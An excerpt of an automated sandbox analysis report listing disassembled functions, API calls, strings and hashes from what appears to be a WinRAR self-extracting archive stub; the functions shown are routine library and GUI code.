Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: be4168964ec781bda815ae777aecd96bc423d706e76f199e35b73e3a128072e7
Instruction ID: 81bacd0743c4fa6a32ce1496da9ccfb70c0914ea37d5ba13af5ff6f276981f78
Opcode Fuzzy Hash: be4168964ec781bda815ae777aecd96bc423d706e76f199e35b73e3a128072e7
Instruction Fuzzy Hash: 63416D71D10618AADB27EBA0DC45FEA77BCAB48305F0190E6E609E6061E7759BC4CB60

Function 00389635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0038964E
GetWindowRect.USER32(?,00000000), ref: 00389693
ShowWindow.USER32(?,00000005,00000000), ref: 0038972A
SetWindowTextW.USER32(?,00000000), ref: 00389732
ShowWindow.USER32(00000000,00000005), ref: 00389748

Strings

RarHtmlClassName, xrefs: 003896F4

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 574a606459fbe0ddcf76259a7c0f68c6a4707a23d2cb38f05ee58a6c2cda99c9
Instruction ID: db7f8d4acf498e9d94eab5df95a6e47c341acf3832c04f0549a5c5534675c4e1
Opcode Fuzzy Hash: 574a606459fbe0ddcf76259a7c0f68c6a4707a23d2cb38f05ee58a6c2cda99c9
Instruction Fuzzy Hash: 9E31CF31005310EFCB13AF64EC48B6B7BACEF48711F09859AFE499A162DB34D905CB61

Function 0039BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0039BF79: _free.LIBCMT ref: 0039BFA2

_free.LIBCMT ref: 0039C003

Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958), ref: 003984F4
Part of subcall function 003984DE: GetLastError.KERNEL32(003A3958,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958,003A3958), ref: 00398506

_free.LIBCMT ref: 0039C00E
_free.LIBCMT ref: 0039C019
_free.LIBCMT ref: 0039C06D
_free.LIBCMT ref: 0039C078
_free.LIBCMT ref: 0039C083
_free.LIBCMT ref: 0039C08E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: abea622e9e210b1c235d9a051cbbc070e6b00970abb5648d76a2f975d4b2f30f
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: DA116D32540B08FBDE22BBB4DD4BFCBF79D6F41700F418824B29E6A452DB64F9048A90

Function 003920CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,003920C1,0038FB12), ref: 003920D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003920E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003920FF
SetLastError.KERNEL32(00000000,?,003920C1,0038FB12), ref: 00392151

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: fa78fa5e1efcbc11bff6ba81d9ff09b4a2979d560427e83ab7a9926cc9ebbdf7
Instruction ID: 7f7e1b4fbddedfed5b262407d84f9e37ddd07f6f20bef74f72cc995c9ce7f64c
Opcode Fuzzy Hash: fa78fa5e1efcbc11bff6ba81d9ff09b4a2979d560427e83ab7a9926cc9ebbdf7
Instruction Fuzzy Hash: 7701A736249B117EBF672BB5BC8996B2B4CEB537B4B220B2AF210591F1EF518C119244

Function 00399029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,003B0EE8,00000200,0039895F,003958FE,?,?,?,?,0037D25E,?,03141BF8,00000063,00000004,0037CFE0,?), ref: 0039902E
_free.LIBCMT ref: 00399063
_free.LIBCMT ref: 0039908A
SetLastError.KERNEL32(00000000,003A3958,00000050,003B0EE8), ref: 00399097
SetLastError.KERNEL32(00000000,003A3958,00000050,003B0EE8), ref: 003990A0

Strings

X:, xrefs: 0039907E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorLast$_free
String ID: X:
API String ID: 3170660625-423137811
Opcode ID: 24507f3a169007d38da64ddb846528fc5470900beef1064cc4bab52337f93c29
Instruction ID: 304239a08fde83f66e76643f3340e02d40a23d440c64c13fca38b74dc978e4ba
Opcode Fuzzy Hash: 24507f3a169007d38da64ddb846528fc5470900beef1064cc4bab52337f93c29
Instruction Fuzzy Hash: 5F01F476605B006BDF23677D6C86B6B2A2D9FD33B1B26012EF52697362EE60CC014160

Function 0038DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 0038DCC9
KERNEL32.DLL, xrefs: 0038DCB4
ReleaseSRWLockExclusive, xrefs: 0038DCD9

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: daecddbbc7fbe090df51bc3770fd9d4c74cc1f26a380449488bc707d50c69696
Instruction ID: af2356f6343fe41bbbf71cdbceb90ed352cdb32cff396a388c96920d5d212a61
Opcode Fuzzy Hash: daecddbbc7fbe090df51bc3770fd9d4c74cc1f26a380449488bc707d50c69696
Instruction Fuzzy Hash: 2B012D726513225B4F237F756C857EA67ACEE43B12B2201BBE502D7380DA91CC45D7A0

Function 00398060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0039807E

Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958), ref: 003984F4
Part of subcall function 003984DE: GetLastError.KERNEL32(003A3958,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958,003A3958), ref: 00398506

_free.LIBCMT ref: 00398090
_free.LIBCMT ref: 003980A3
_free.LIBCMT ref: 003980B4
_free.LIBCMT ref: 003980C5

Strings

:, xrefs: 00398074

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: :
API String ID: 776569668-3499768093
Opcode ID: 5bd0bd90c17979e2daf85fa026022585bf92d5bf26564ee29ee30417905a774c
Instruction ID: 0c043a6020c885f38fc11cee875e0d139773d094d778aa976369be02015519d3
Opcode Fuzzy Hash: 5bd0bd90c17979e2daf85fa026022585bf92d5bf26564ee29ee30417905a774c
Instruction Fuzzy Hash: 87F05E76902125AFCB136F16BC114057B6DFB56720B0B4A1BF800ABB70CF3298519FC1

Function 00380CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00380D0D

Part of subcall function 0037ACF5: GetVersionExW.KERNEL32(?), ref: 0037AD1A

LocalFileTimeToFileTime.KERNEL32(?,00380CB8), ref: 00380D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00380D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00380D56
SystemTimeToFileTime.KERNEL32(?,00380CB8), ref: 00380D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00380D72

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: cbca1df93207a9d05951b4363f49a3d8ea98c6658bee245eb1c8d1afdedec656
Instruction ID: cfd2f670fba22b3aaa11fe093d10343192881d053ac03d2b16cd644ffb2baf29
Opcode Fuzzy Hash: cbca1df93207a9d05951b4363f49a3d8ea98c6658bee245eb1c8d1afdedec656
Instruction Fuzzy Hash: 2E31E97A90020AEBCB05EFE5C8859EFBBBCFF58700F04455AE955E7210E7309645CB64

Function 003891B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 003891D4
_memcmp.LIBVCRUNTIME ref: 003891EB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 3cae82b024700a2f38337d1ec2f3c92cbf22af54bc37c874367220e020d87b82
Instruction ID: d43a36ba39d2f979a01c175b33fde519ddac2701717e06eba6a76198a1724e22
Opcode Fuzzy Hash: 3cae82b024700a2f38337d1ec2f3c92cbf22af54bc37c874367220e020d87b82
Instruction Fuzzy Hash: 4321A37160430EBBDB07BA10CC81F7B77ADEB91784B1889A6FC099A246E360ED459790

Function 0038D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0038D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038D31D
TranslateMessage.USER32(?), ref: 0038D327
DispatchMessageW.USER32(?), ref: 0038D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0038D33C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 773f8f1d6d1cd40cfec692e6aba48f271788ba48bccb57e8a43a84b076e21d1a
Instruction ID: 823667c42f612bde1e91b5077d95279846ca520b8976755aaa6c5e183a90ef5a
Opcode Fuzzy Hash: 773f8f1d6d1cd40cfec692e6aba48f271788ba48bccb57e8a43a84b076e21d1a
Instruction Fuzzy Hash: 47F03C72A02219ABCB22ABA1EC4DEDBBF6DEF62391F048012F606D2050D6748541C7B1

Function 0038C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0038C435

Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2

Strings

MIN, xrefs: 0038C4A3
MAX, xrefs: 0038C487
HIDE, xrefs: 0038C474
<, xrefs: 0038C41E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 69e5a7276df0a1868ec97f405d6b9a0cef68cc78eea46279f6e15b0f8038c2b7
Instruction ID: 576767095bf5740e03b3ae93bcceea7d3a985f6b36ec552630d404d46616e2c0
Opcode Fuzzy Hash: 69e5a7276df0a1868ec97f405d6b9a0cef68cc78eea46279f6e15b0f8038c2b7
Instruction Fuzzy Hash: 5A318172910709AADF27EA95CC81FEA77BCEB54310F0140E6FA05E7051EBB59EC48B60

Function 0038A990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

EndDialog.USER32(?,00000001), ref: 0038A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0038A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0038AA24

Strings

GETPASSWORD1, xrefs: 0038A9A9
xj<, xrefs: 0038AA02

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xj<
API String ID: 445417207-1985457453
Opcode ID: 60272082f61f149ca93969cfe8d28d21eab05caf851067fa41720f9f04912747
Instruction ID: 1b98ef4ada700acfd62c6168042a057a95b5fd811babe03aa8175c1716348cbe
Opcode Fuzzy Hash: 60272082f61f149ca93969cfe8d28d21eab05caf851067fa41720f9f04912747
Instruction Fuzzy Hash: 6E11483394421CBAEB33AA749D09FFB372CEB49300F010093FA49B6480C2A49D51D772

Function 0038ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0038ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0038AE22
DeleteObject.GDI32(00000000), ref: 0038AE54
DeleteObject.GDI32(00000000), ref: 0038AE77

Part of subcall function 00389E1C: FindResourceW.KERNEL32(0038AE4D,PNG,?,?,?,0038AE4D,00000066), ref: 00389E2E
Part of subcall function 00389E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0038AE4D,00000066), ref: 00389E46
Part of subcall function 00389E1C: LoadResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E59
Part of subcall function 00389E1C: LockResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E64

Strings

], xrefs: 0038AE2A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: 027263013b7dbfe01e9d3a50823c78426517f23e9a4b1a0e08d3716b3a897d07
Instruction ID: 18f597c976303de839c6421f3c78428b4293d7e0098aabdf0b16f73761c78074
Opcode Fuzzy Hash: 027263013b7dbfe01e9d3a50823c78426517f23e9a4b1a0e08d3716b3a897d07
Instruction Fuzzy Hash: 7B010032541715A7D7137764AC05B7FBB6EAB81B42F090193BE00AB291DA319C1593B2

Function 0038CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

EndDialog.USER32(?,00000001), ref: 0038CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0038CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0038CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0038CD14

Strings

RENAMEDLG, xrefs: 0038CCA8

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: b4b058f5b52053fc6a0d1603b790f5142166db1dee5093b2b2e147ffaa5591a3
Instruction ID: 71d980f48e7e196007fd550cc3b1a5a5150a184b089a85ff05ac446452ea33bb
Opcode Fuzzy Hash: b4b058f5b52053fc6a0d1603b790f5142166db1dee5093b2b2e147ffaa5591a3
Instruction Fuzzy Hash: 5E0124322953107FD6236F64AC08F677B6CEB6AB02F118412F346A20E0C6B169068B75

Function 00392503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0039251A

Part of subcall function 00392B52: ___AdjustPointer.LIBCMT ref: 00392B9C

_UnwindNestedFrames.LIBCMT ref: 00392531
___FrameUnwindToState.LIBVCRUNTIME ref: 00392543
CallCatchBlock.LIBVCRUNTIME ref: 00392567

Strings

/)9, xrefs: 00392526, 00392517

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /)9
API String ID: 2633735394-3608399660
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 75c074d27adc4b4e10adde498159573e5c41bd874ef404403204b05d256e0966
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 71011332000508BFCF13AF65DC41EDB7BBAEF59710F068014F9186A120C336E961EBA1

Function 003975C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00397573,00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002), ref: 003975E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003975F5
FreeLibrary.KERNEL32(00000000,?,?,?,00397573,00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002), ref: 00397618

Strings

CorExitProcess, xrefs: 003975ED
mscoree.dll, xrefs: 003975DB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
